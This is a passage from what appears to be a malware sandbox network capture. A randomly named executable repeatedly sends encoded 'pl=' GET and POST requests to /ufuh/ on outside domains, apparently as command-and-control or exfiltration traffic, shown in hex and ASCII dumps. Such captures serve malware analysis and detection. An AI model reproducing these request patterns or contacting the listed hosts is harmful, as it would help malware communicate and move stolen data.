                                                                                            Data Raw: 70 6c 3d 6a 44 58 71 4f 62 6b 69 45 6a 42 59 52 56 37 70 45 6f 73 46 58 52 6f 6c 30 63 37 5a 78 7a 6b 66 6d 54 4b 6e 59 53 55 45 50 73 5a 67 4f 64 6d 4d 74 6c 33 4f 4c 6d 71 65 4b 76 70 76 30 6c 5a 6f 41 43 32 53 58 51 4d 61 47 65 33 57 47 59 36 32 4e 4e 4d 77 74 31 31 54 65 48 62 33 31 52 59 78 30 2b 6c 6c 4f 76 75 52 54 54 48 76 57 32 46 4c 50 72 7a 42 6f 32 59 42 38 72 35 43 4d 4c 54 39 69 4e 62 52 30 51 34 30 44 78 4c 49 37 52 54 39 69 4a 71 39 4d 77 45 41 61 51 79 39 61 36 6a 32 49 53 6a 39 63 55 45 38 54 4f 57 70 30 65 4e 6c 72 56 6f 78 6c 41 52 48 6d 50 56 77 67 6c 43 79 65 70 54 6b 75 6b 56 45 52 47 43 56 31 54 2f 37 48 61 4e 56 4c 57 44 41 4f 6f 75 6d 37 4e 6e 33 43 71 6c 65 61 6b 79 72 53 54 69 53 2f 38 79 77 6a 77 32 76 34 62 31 4e 71 52 47 72 46 54 5a 6f 73 65 62 79 78 38 50 74 4f 43 61 2f 4a 74 54 68 74 4f 66 78 4a 74 64 6a 6e 6a 73 36 79 47 4d 4e 77 73 6d 65 77 42 68 51 7a 30 51 51 41 6d 64 63 77 38 76 68 4f 68 6b 63 31 4b 7a 6c 37 37 52 73 42 6a 36 45 48 32 31 41 79 57 67 41 36 76 59 [TRUNCATED]
                                                                                            Data Ascii: pl=jDXqObkiEjBYRV7pEosFXRol0c7ZxzkfmTKnYSUEPsZgOdmMtl3OLmqeKvpv0lZoAC2SXQMaGe3WGY62NNMwt11TeHb31RYx0+llOvuRTTHvW2FLPrzBo2YB8r5CMLT9iNbR0Q40DxLI7RT9iJq9MwEAaQy9a6j2ISj9cUE8TOWp0eNlrVoxlARHmPVwglCyepTkukVERGCV1T/7HaNVLWDAOoum7Nn3CqleakyrSTiS/8ywjw2v4b1NqRGrFTZosebyx8PtOCa/JtThtOfxJtdjnjs6yGMNwsmewBhQz0QQAmdcw8vhOhkc1Kzl77RsBj6EH21AyWgA6vYoJu50P5/kfBCzQ+0Clo+1dOqQBOdd04lx1lmsV48IcrfrXl84tSb0U/odDQ/fNCNwTlcZz3uP3MuDz7ldo+i9Wcf4vuDawGhlLOybjsOKtlbj0jvZZEMy31hGJiQ4tAtf70meymUkBMIK6RT1YbjKZIoA1vrgb8uhVkMLmDmUIiXe0B4dY9rSymxVU5M7T24rFBwoetbBMLEQrxz8XEEORcIMrDVJVHsp8vnHF0S5QkWn9rS6hyYtBowlpuHRJRIB8/2wAXDS5kPUxSS1GPgMnUlKauNerih/1+ZWcKpwa4GaJmQX9TdulT38zy/BYSzLeN02tjZ0MUtykKaKC5jgVvV3/TjKqUgML2A5QkVmbnbuiatp4D3SQi2LTf7DVDh+wgCtomAkDWUBYaao3SKNDgDthhvPchHBbjBTUkU1fBGPH7nHXknWfvqkyAgcmFodOCOv+1nTqs0fWqiRzICevRWI95LweZDfMcS95FqzXsvoh5AaBTLMoU6XO09zEqI1nVLJHslLnBxn8rlu8h6cSF75pyHmJomF/mb9iU7sJT62xEKSDqanVyvqZ1D4kOOPiCqe74tdkJkp2LXG7L2kWZt2YS3h9zwEvpmF2RA8jI3ErA1VHFr6JAx8AQWjTYrj67uOtt1QpndDJ7nhm4yUe7iQXsEJ4AvhO [TRUNCATED]
                                                                                            May 2, 2024 08:28:03.125252962 CEST208INHTTP/1.1 403 Forbidden
                                                                                            content-length: 93
                                                                                            cache-control: no-cache
                                                                                            content-type: text/html
                                                                                            connection: close
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                            Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                                                                                            May 2, 2024 08:28:03.125319958 CEST1576OUTData Raw: 73 43 59 39 77 45 57 50 37 59 4f 31 50 41 50 6d 64 6c 4c 5a 54 58 6a 78 6b 63 34 71 30 64 59 53 35 67 64 4c 6e 37 75 66 52 59 2b 6a 53 4f 76 74 50 69 72 41 63 76 4c 5a 70 37 68 2f 48 42 42 56 4c 6b 52 78 4c 6e 55 41 50 73 72 4b 55 45 44 48 78 71
                                                                                            Data Ascii: sCY9wEWP7YO1PAPmdlLZTXjxkc4q0dYS5gdLn7ufRY+jSOvtPirAcvLZp7h/HBBVLkRxLnUAPsrKUEDHxq5fLGUo1vZwv0wgJnN7odEuhc8h3Oo1SwFQg28tvVdVcaHMFrjzV1j+az/XBqloyR1kTxl8H8wDElz7AjssQLF6KkG4dqVph872eCGUJOCAHtgZQeF3770DypzG586wAu1AD877p5kBN219ac203+lLxFjsBFzRtqF


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            13192.168.2.224917791.195.240.19802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:28:05.644785881 CEST468OUTGET /ufuh/?pl=uB/KNrYRIAEuVxS2CaQ/STQ79sXR+BlQlR67HQQqBOVPNI2QjXmfUVSCEalfoT0oEVOLH05GPMXaAce1CehAlwJBdX/jzmgGgvdHGe2cEEX0VUceLY//9BYN6rMd&5h1t=6H6PKFvXjtI4u8k HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Connection: close
                                                                                            Host: www.primeplay88.org
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            May 2, 2024 08:28:05.819519043 CEST208INHTTP/1.1 403 Forbidden
                                                                                            content-length: 93
                                                                                            cache-control: no-cache
                                                                                            content-type: text/html
                                                                                            connection: close
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                            Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            14192.168.2.2249178198.12.241.35802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:28:11.079615116 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 2159
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.aceautocorp.com
                                                                                            Origin: http://www.aceautocorp.com
                                                                                            Referer: http://www.aceautocorp.com/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 6d 43 38 6c 66 71 4d 48 33 4b 39 4f 68 76 33 61 36 74 2f 57 76 35 74 71 47 64 46 76 61 35 50 43 4e 45 69 66 78 74 79 41 6f 30 50 36 78 6f 43 72 67 2b 44 4f 6d 6b 74 4d 50 66 58 67 63 61 5a 5a 6c 4f 52 79 4f 35 31 4d 76 65 39 32 2b 34 35 57 37 6f 6e 4a 6b 67 75 51 48 6f 44 5a 64 51 6e 79 47 4a 68 34 57 56 63 63 76 50 4f 73 30 31 49 68 61 37 43 6e 5a 53 4a 39 5a 56 5a 69 65 6d 46 30 70 63 6b 68 43 43 39 43 41 70 58 63 72 73 46 47 4b 59 2b 79 72 50 47 4d 61 51 61 43 4e 4e 31 42 6a 4d 72 2b 62 6c 31 4b 31 38 36 6c 59 2f 4f 45 62 2b 64 55 66 42 37 46 2f 4f 75 66 53 4b 54 6f 4b 6f 56 47 46 32 54 63 59 55 4b 43 38 2b 6f 76 53 6d 47 70 38 32 4f 31 55 6f 2b 63 4f 42 54 39 6e 45 46 69 64 52 50 69 35 46 37 51 6c 31 79 38 49 73 61 6a 65 48 7a 61 2f 35 58 48 39 36 48 77 65 70 65 30 4c 39 57 35 65 2f 64 54 31 7a 48 36 5a 5a 4f 48 31 48 2f 45 65 5a 7a 6b 45 70 47 6b 62 35 78 35 56 79 7a 4e 56 47 67 37 72 47 30 32 63 35 76 38 43 36 39 52 43 6b 37 57 52 77 71 56 77 77 42 45 39 75 2f 51 61 2b 55 65 44 6c 72 [TRUNCATED]
                                                                                            Data Ascii: pl=mC8lfqMH3K9Ohv3a6t/Wv5tqGdFva5PCNEifxtyAo0P6xoCrg+DOmktMPfXgcaZZlORyO51Mve92+45W7onJkguQHoDZdQnyGJh4WVccvPOs01Iha7CnZSJ9ZVZiemF0pckhCC9CApXcrsFGKY+yrPGMaQaCNN1BjMr+bl1K186lY/OEb+dUfB7F/OufSKToKoVGF2TcYUKC8+ovSmGp82O1Uo+cOBT9nEFidRPi5F7Ql1y8IsajeHza/5XH96Hwepe0L9W5e/dT1zH6ZZOH1H/EeZzkEpGkb5x5VyzNVGg7rG02c5v8C69RCk7WRwqVwwBE9u/Qa+UeDlrB3UEnvBmTAGcdR7IdoTHMvvJy+fzdR7U7Pm08uxlXYVbSUIFidczDQLTLu3dsB0lBubzz9/EHluNWXv8spFIK1r0ed0j5MODYqK30yn5BcplTkeSmAVxuWUlfpXcnZaG1OCQZn1ZzQN8MRQ1fGgc0LmqybdS21XZ3jGHIOFKrEc/uSSyIAbPwKJBMA/SxhDuBH9yh5Pn7SFov9k8r2IXfrsP6WMNWC9UqrZRxNaHLPJVdLrMyEtxC3BIvsSO3UhbmxEfW7SSccNqDUEEFaySK35TjFktSBGC7dD31bIQ4UWvlRF3Nu+UIK8zBu7EvEKVAoFzFf6J+yuGM+mlWr7//2SWKdMwN8fZwVly79kb6kkjh2AQ7KWasEz+0JF+jF/AQpN+ADUVDELX3DEw8pNARu5A4mzAQRVXFhJl+OQlRimJVHYQYq9GG5B72KZOT4D0gSnEdDY5M7kFJp0h/YLX9pa3x0it/n+66ryHLTNXGfZ1slN93zRJlwSfwA4qZ1fnfmkmi+A+bi/Y5R/2apLe8i4VxUKlMurKrf2cvhWZZZBwRRhH2Gs4Da1IffmvHXnxzYogWjvjA59PcaOrtbcoPF17KAKDh7sUye34tTv2Au9f+MFARvGiFHslJxItk8wHmFGEjJ1U3hIRPdDZJECYeDBi+PtO0gsfdd [TRUNCATED]
                                                                                            May 2, 2024 08:28:11.235708952 CEST112OUTData Raw: 66 53 67 56 41 41 67 41 2f 33 33 4c 6d 79 55 7a 71 6a 41 30 38 68 57 64 66 38 75 78 7a 48 32 6c 37 47 6b 6c 48 79 7a 50 6b 48 41 63 4d 69 6e 39 77 48 47 4a 62 51 79 68 39 4a 50 74 5a 7a 4c 30 58 76 46 35 79 35 6d 2b 38 4b 45 73 63 42 30 47 79 79
                                                                                            Data Ascii: fSgVAAgA/33LmyUzqjA08hWdf8uxzH2l7GklHyzPkHAcMin9wHGJbQyh9JPtZzL0XvF5y5m+8KEscB0Gyy/T8ICYmbAAEYnYbGUicBRA58bOHnCk
                                                                                            May 2, 2024 08:28:11.458331108 CEST1289INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 02 May 2024 06:28:11 GMT
                                                                                            Server: Apache
                                                                                            X-Powered-By: PHP/8.1.28
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"
                                                                                            Upgrade: h2,h2c
                                                                                            Connection: Upgrade, close
                                                                                            Vary: Accept-Encoding
                                                                                            Content-Encoding: br
                                                                                            Content-Length: 9730
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Data Raw: 13 53 cb 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 9f a9 da 9f a5 cb e9 19 9e 48 84 03 40 00 58 5a a8 14 67 8b 7f 69 4e 7e b3 3d 1e 88 04 25 6e 28 82 03 40 c5 cb e5 5f b6 ea f3 bc a5 63 32 81 24 59 32 81 97 2c 39 06 a2 b9 7a 90 79 aa ea 9e 8e a8 9e d9 d1 70 a8 17 4e 31 24 c5 e2 1d 67 be 84 aa ae ae ee e1 fb fb 91 c1 33 84 e8 38 72 ec 19 61 0b d8 70 64 b8 64 58 86 6c 3d 86 6a b2 fd b4 fb 06 11 51 14 51 93 76 db 70 79 99 58 f7 de 86 10 ac 25 02 13 93 a1 9a c9 d8 e4 97 03 27 30 58 c8 54 32 df 5a 8c b9 bd 10 f9 21 22 92 70 57 3d 45 37 cf 39 e5 74 4c 81 19 a8 3e 4a c0 e0 76 c9 35 60 d2 59 2b a4 87 09 0e f6 69 16 b9 6c 1f ae 50 b2 ab bd c4 70 95 53 0a 88 16 3a 07 45 5b 15 ee 10 81 d8 52 ea 36 2b 81 cb 7c 4a d7 a9 3f ec d6 2f 07 d6 47 75 3d 07 c6 20 1d 63 99 16 f1 4c d7 9e 29 be c0 be 19 18 8c 07 76 25 90 77 ef 5d 88 12 3e d7 1a 3e 9f bc 81 d4 31 ce 7a f6 48 cb 0f 7d 37 fc 00 ab fb 6a dd 0c 0e f3 35 68 b5 af 0f eb 13 37 5c 6c b3 51 b5 be df 84 4d 3b 4e f0 a0 d0 b4 c7 0a 88 a3 69 9d 91 4b 37 9c 15 e8 a8 83 [TRUNCATED]
                                                                                            Data Ascii: SC@E`:H@XZgiN~=%n(@_c2$Y2,9zypN1$g38rapddXl=jQQvpyX%'0XT2Z!"pW=E79tL>Jv5`Y+ilPpS:E[R6+|J?/Gu= cL)v%w]>>1zH}7j5h7\lQM;NiK7p^ucBN6_m},5Ce{fQo*Pnz]y8v3<&{iy<oD87yW$7D;qe;z;lhBjr$c:ysDu*uVQ=Y*a1h8uuZ,o:2L.}@yW7+4)EwufxfN!mGw[1\~YiI<fy8DZgk'>sDoO8uI+J{7P~V/.W0U@/EVhzVx&5tUUo<QSF*<OMmSy|7'k?M^6DtJxm"~bW]OYFDAr~5]nij~n
                                                                                            May 2, 2024 08:28:11.458353043 CEST1289INData Raw: cf 58 0a 22 e5 df d8 82 60 8c d9 0a cd f7 03 2d ab d5 a0 9b aa 88 ff 52 d3 c2 7f 8c fd a1 ad 16 72 e8 63 6d 46 bd 5a 29 0d 75 b8 77 8b 2b 0f 35 58 f2 31 4f 8f ff bd 6d 2b fe f4 3e b3 26 81 b2 75 8d 44 cc 71 d1 a9 08 35 94 9b 0f 41 98 a8 ca 66 7e
                                                                                            Data Ascii: X"`-RrcmFZ)uw+5X1Om+>&uDq5Af~u/I+V*7|Tbr]!oFDkM"!>NLf?gg_*(1P!j=3,=s4'blT=Y{5*0?UjNr
                                                                                            May 2, 2024 08:28:11.458373070 CEST1289INData Raw: 56 63 31 18 1f 14 f6 fb 26 2e ec f2 5f 42 7b ed bd b6 53 d7 09 b0 a3 50 e2 98 cb 58 a4 8f 6e f0 58 2b ec fb f4 61 fd 3f 55 f6 09 ce cb 2b 97 4a 07 58 92 95 69 9d 31 ae 76 7c 31 13 fa 08 1c 78 c9 76 ec 97 c2 e3 5f a5 45 8f 05 18 3e 66 e7 9d 69 de
                                                                                            Data Ascii: Vc1&._B{SPXnX+a?U+JXi1v|1xv_E>fi+1L-G<`jDbu2qI_H&YAM{VuUcbQwB'oX\$k[DR9#]QmS;'HJb#Q`{m+F&dhZ
                                                                                            May 2, 2024 08:28:11.458434105 CEST1289INData Raw: aa 58 ad 61 f7 13 cb c5 a2 6d 8a 35 b1 bc bb 7e 9d 11 e3 06 51 9d 8b 60 b9 17 f6 52 8c 5c 9b d1 b5 73 ce 9c f1 14 44 d4 1d 4e 85 72 86 c7 ea c0 74 51 a6 04 69 19 e0 3b 43 b4 61 9e b5 20 30 37 29 e6 67 a4 53 0f 29 ce f6 48 e9 bc 8b 1a 55 d5 6e 83
                                                                                            Data Ascii: Xam5~Q`R\sDNrtQi;Ca 07)gS)HUn[zJ?LD,)RQdFfvIzbj^XM!) qpaTq0)'RkLWQ'e3vxJ&*<dR3B#)&0
                                                                                            May 2, 2024 08:28:11.458558083 CEST1289INData Raw: 12 25 24 4a 3e 44 2d c6 4a de ec 8a 7d 0b e2 80 0c 33 72 ab e1 57 8a 24 27 22 8b 60 4d 79 cc 02 4c 38 03 f1 c2 8c 31 b7 3d 75 a3 ae bd 3d 1d 3f 7e 21 8d 08 24 51 e1 9b f5 ae 25 88 90 a7 b3 e5 18 64 2e 40 e1 1c 4c 30 44 eb df 1c 66 b5 a8 8a 0c 24
                                                                                            Data Ascii: %$J>D-J}3rW$'"`MyL81=u=?~!$Q%d.@L0Df$~$Me$lkKhl6X\W-yBd`"#vvN:]c}:&"aaQLkfO'9^!Bfyc8A2$&Yb<b|D4$K5%R,P/IUGmW-\5#B6|mBV%
                                                                                            May 2, 2024 08:28:11.458573103 CEST1289INData Raw: 26 df 29 d7 ff ab c6 65 d1 c3 c6 41 78 d2 f4 56 44 47 5c 67 87 f5 55 4d 2d 81 39 3e e1 0c b3 95 04 fe 96 96 c9 60 93 22 d5 94 ba 63 9b cc c6 5d 17 80 2b 18 a9 80 39 1e e1 9c 58 0e 15 2c cf dd 78 c1 57 a5 d7 84 cb 90 ea cb c8 8b 71 d9 ab e1 8c 23
                                                                                            Data Ascii: &)eAxVDG\gUM-9>`"c]+9X,xWq#VuPW6Np^3lqq|.)Ho2Q!DX:RK?0MC.PZ-Tl2p>I8D1C2U()WD&'SS$r>rg|#wTo]@C<qg|H
                                                                                            May 2, 2024 08:28:11.458609104 CEST1289INData Raw: 89 4e 47 ca da cd 55 c1 49 2f c4 6c c9 49 d8 4c e2 6e 0b af f7 c6 76 da 4d 53 26 fa ce e5 c0 03 d4 bf 8d 68 c0 ee e8 9b 41 c2 c3 81 ec 4c 87 c1 ea 59 9a a3 39 16 8d d8 1c 25 14 41 ad fa 14 23 01 83 cf a6 ac 56 c5 99 2b aa 0d 89 ca 25 09 3d 98 22
                                                                                            Data Ascii: NGUI/lILnvMS&hALY9%A#V+%="}S#L3%I'0hr<Mw$FUS'tIr1icvk1H4gUR)~,kN#HI-=.UR}V #
                                                                                            May 2, 2024 08:28:11.458674908 CEST1124INData Raw: 71 b0 82 42 11 c5 08 57 83 00 00 b6 57 7b 94 97 0c 7a 77 54 eb 12 64 a9 6b 1e 6c 74 3c 8c 0a 04 db c7 50 7d c6 f0 a4 95 40 9c d1 e2 b5 32 03 08 b6 1f d2 f2 9d 09 62 74 3a 1c 4a 42 19 c2 53 35 e4 78 5b 3f 5c ad 17 c3 15 62 7d ab ea 45 ca 39 54 29
                                                                                            Data Ascii: qBWW{zwTdklt<P}@2bt:JBS5x[?\b}E9T)t8Bm=[6Qy[ru\;vH6/ddSp[\RtD*Bx-=B%4%P4/g[jjKXg2:4X\tR-vFv7Nw[^


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            15192.168.2.2249179198.12.241.35802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:28:18.419702053 CEST729OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.aceautocorp.com
                                                                                            Origin: http://www.aceautocorp.com
                                                                                            Referer: http://www.aceautocorp.com/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 6d 43 38 6c 66 71 4d 48 33 4b 39 4f 68 73 66 61 34 2f 48 57 75 5a 74 71 46 64 46 76 42 4a 50 45 4e 45 75 74 78 76 66 46 70 44 72 36 32 38 4f 72 68 4d 72 4f 68 6b 74 4c 62 50 58 6b 52 36 5a 41 6c 4f 52 41 4f 35 35 4d 76 65 35 32 73 75 39 57 39 74 4c 4f 6d 51 75 53 54 59 44 59 64 51 36 4f 47 4a 74 6f 57 55 6b 63 76 4d 61 73 79 45 34 68 50 76 69 6e 66 69 4a 33 51 31 5a 78 65 6d 4a 68 70 63 56 74 43 43 52 43 41 59 4c 63 72 39 6c 47 49 35 2b 79 77 66 47 4e 58 77 62 30 47 34 45 2f 6d 50 58 68 48 45 42 32 32 2f 57 2b 46 6f 61 4a 52 73 46 6c 63 54 66 59 36 49 62 63 45 36 4f 63 4a 51 3d 3d
                                                                                            Data Ascii: pl=mC8lfqMH3K9Ohsfa4/HWuZtqFdFvBJPENEutxvfFpDr628OrhMrOhktLbPXkR6ZAlORAO55Mve52su9W9tLOmQuSTYDYdQ6OGJtoWUkcvMasyE4hPvinfiJ3Q1ZxemJhpcVtCCRCAYLcr9lGI5+ywfGNXwb0G4E/mPXhHEB22/W+FoaJRsFlcTfY6IbcE6OcJQ==
                                                                                            May 2, 2024 08:28:18.663295031 CEST1289INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 02 May 2024 06:28:18 GMT
                                                                                            Server: Apache
                                                                                            X-Powered-By: PHP/8.1.28
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"
                                                                                            Upgrade: h2,h2c
                                                                                            Connection: Upgrade, close
                                                                                            Vary: Accept-Encoding
                                                                                            Content-Encoding: br
                                                                                            Content-Length: 9730
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Data Raw: 13 53 cb 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 9f a9 da 9f a5 cb e9 19 9e 48 84 03 40 00 58 5a a8 14 67 8b 7f 69 4e 7e b3 3d 1e 88 04 25 6e 28 82 03 40 c5 cb e5 5f b6 ea f3 bc a5 63 32 81 24 59 32 81 97 2c 39 06 a2 b9 7a 90 79 aa ea 9e 8e a8 9e d9 d1 70 a8 17 4e 31 24 c5 e2 1d 67 be 84 aa ae ae ee e1 fb fb 91 c1 33 84 e8 38 72 ec 19 61 0b d8 70 64 b8 64 58 86 6c 3d 86 6a b2 fd b4 fb 06 11 51 14 51 93 76 db 70 79 99 58 f7 de 86 10 ac 25 02 13 93 a1 9a c9 d8 e4 97 03 27 30 58 c8 54 32 df 5a 8c b9 bd 10 f9 21 22 92 70 57 3d 45 37 cf 39 e5 74 4c 81 19 a8 3e 4a c0 e0 76 c9 35 60 d2 59 2b a4 87 09 0e f6 69 16 b9 6c 1f ae 50 b2 ab bd c4 70 95 53 0a 88 16 3a 07 45 5b 15 ee 10 81 d8 52 ea 36 2b 81 cb 7c 4a d7 a9 3f ec d6 2f 07 d6 47 75 3d 07 c6 20 1d 63 99 16 f1 4c d7 9e 29 be c0 be 19 18 8c 07 76 25 90 77 ef 5d 88 12 3e d7 1a 3e 9f bc 81 d4 31 ce 7a f6 48 cb 0f 7d 37 fc 00 ab fb 6a dd 0c 0e f3 35 68 b5 af 0f eb 13 37 5c 6c b3 51 b5 be df 84 4d 3b 4e f0 a0 d0 b4 c7 0a 88 a3 69 9d 91 4b 37 9c 15 e8 a8 83 [TRUNCATED]
                                                                                            Data Ascii: SC@E`:H@XZgiN~=%n(@_c2$Y2,9zypN1$g38rapddXl=jQQvpyX%'0XT2Z!"pW=E79tL>Jv5`Y+ilPpS:E[R6+|J?/Gu= cL)v%w]>>1zH}7j5h7\lQM;NiK7p^ucBN6_m},5Ce{fQo*Pnz]y8v3<&{iy<oD87yW$7D;qe;z;lhBjr$c:ysDu*uVQ=Y*a1h8uuZ,o:2L.}@yW7+4)EwufxfN!mGw[1\~YiI<fy8DZgk'>sDoO8uI+J{7P~V/.W0U@/EVhzVx&5tUUo<QSF*<OMmSy|7'k?M^6DtJxm"~bW]OYFDAr~5]nij~n
                                                                                            May 2, 2024 08:28:18.663326979 CEST1289INData Raw: cf 58 0a 22 e5 df d8 82 60 8c d9 0a cd f7 03 2d ab d5 a0 9b aa 88 ff 52 d3 c2 7f 8c fd a1 ad 16 72 e8 63 6d 46 bd 5a 29 0d 75 b8 77 8b 2b 0f 35 58 f2 31 4f 8f ff bd 6d 2b fe f4 3e b3 26 81 b2 75 8d 44 cc 71 d1 a9 08 35 94 9b 0f 41 98 a8 ca 66 7e
                                                                                            Data Ascii: X"`-RrcmFZ)uw+5X1Om+>&uDq5Af~u/I+V*7|Tbr]!oFDkM"!>NLf?gg_*(1P!j=3,=s4'blT=Y{5*0?UjNr
                                                                                            May 2, 2024 08:28:18.663345098 CEST1289INData Raw: 56 63 31 18 1f 14 f6 fb 26 2e ec f2 5f 42 7b ed bd b6 53 d7 09 b0 a3 50 e2 98 cb 58 a4 8f 6e f0 58 2b ec fb f4 61 fd 3f 55 f6 09 ce cb 2b 97 4a 07 58 92 95 69 9d 31 ae 76 7c 31 13 fa 08 1c 78 c9 76 ec 97 c2 e3 5f a5 45 8f 05 18 3e 66 e7 9d 69 de
                                                                                            Data Ascii: Vc1&._B{SPXnX+a?U+JXi1v|1xv_E>fi+1L-G<`jDbu2qI_H&YAM{VuUcbQwB'oX\$k[DR9#]QmS;'HJb#Q`{m+F&dhZ
                                                                                            May 2, 2024 08:28:18.663357973 CEST1289INData Raw: aa 58 ad 61 f7 13 cb c5 a2 6d 8a 35 b1 bc bb 7e 9d 11 e3 06 51 9d 8b 60 b9 17 f6 52 8c 5c 9b d1 b5 73 ce 9c f1 14 44 d4 1d 4e 85 72 86 c7 ea c0 74 51 a6 04 69 19 e0 3b 43 b4 61 9e b5 20 30 37 29 e6 67 a4 53 0f 29 ce f6 48 e9 bc 8b 1a 55 d5 6e 83
                                                                                            Data Ascii: Xam5~Q`R\sDNrtQi;Ca 07)gS)HUn[zJ?LD,)RQdFfvIzbj^XM!) qpaTq0)'RkLWQ'e3vxJ&*<dR3B#)&0
                                                                                            May 2, 2024 08:28:18.663378000 CEST1289INData Raw: 12 25 24 4a 3e 44 2d c6 4a de ec 8a 7d 0b e2 80 0c 33 72 ab e1 57 8a 24 27 22 8b 60 4d 79 cc 02 4c 38 03 f1 c2 8c 31 b7 3d 75 a3 ae bd 3d 1d 3f 7e 21 8d 08 24 51 e1 9b f5 ae 25 88 90 a7 b3 e5 18 64 2e 40 e1 1c 4c 30 44 eb df 1c 66 b5 a8 8a 0c 24
                                                                                            Data Ascii: %$J>D-J}3rW$'"`MyL81=u=?~!$Q%d.@L0Df$~$Me$lkKhl6X\W-yBd`"#vvN:]c}:&"aaQLkfO'9^!Bfyc8A2$&Yb<b|D4$K5%R,P/IUGmW-\5#B6|mBV%
                                                                                            May 2, 2024 08:28:18.663393974 CEST1289INData Raw: 26 df 29 d7 ff ab c6 65 d1 c3 c6 41 78 d2 f4 56 44 47 5c 67 87 f5 55 4d 2d 81 39 3e e1 0c b3 95 04 fe 96 96 c9 60 93 22 d5 94 ba 63 9b cc c6 5d 17 80 2b 18 a9 80 39 1e e1 9c 58 0e 15 2c cf dd 78 c1 57 a5 d7 84 cb 90 ea cb c8 8b 71 d9 ab e1 8c 23
                                                                                            Data Ascii: &)eAxVDG\gUM-9>`"c]+9X,xWq#VuPW6Np^3lqq|.)Ho2Q!DX:RK?0MC.PZ-Tl2p>I8D1C2U()WD&'SS$r>rg|#wTo]@C<qg|H
                                                                                            May 2, 2024 08:28:18.663409948 CEST1289INData Raw: 89 4e 47 ca da cd 55 c1 49 2f c4 6c c9 49 d8 4c e2 6e 0b af f7 c6 76 da 4d 53 26 fa ce e5 c0 03 d4 bf 8d 68 c0 ee e8 9b 41 c2 c3 81 ec 4c 87 c1 ea 59 9a a3 39 16 8d d8 1c 25 14 41 ad fa 14 23 01 83 cf a6 ac 56 c5 99 2b aa 0d 89 ca 25 09 3d 98 22
                                                                                            Data Ascii: NGUI/lILnvMS&hALY9%A#V+%="}S#L3%I'0hr<Mw$FUS'tIr1icvk1H4gUR)~,kN#HI-=.UR}V #
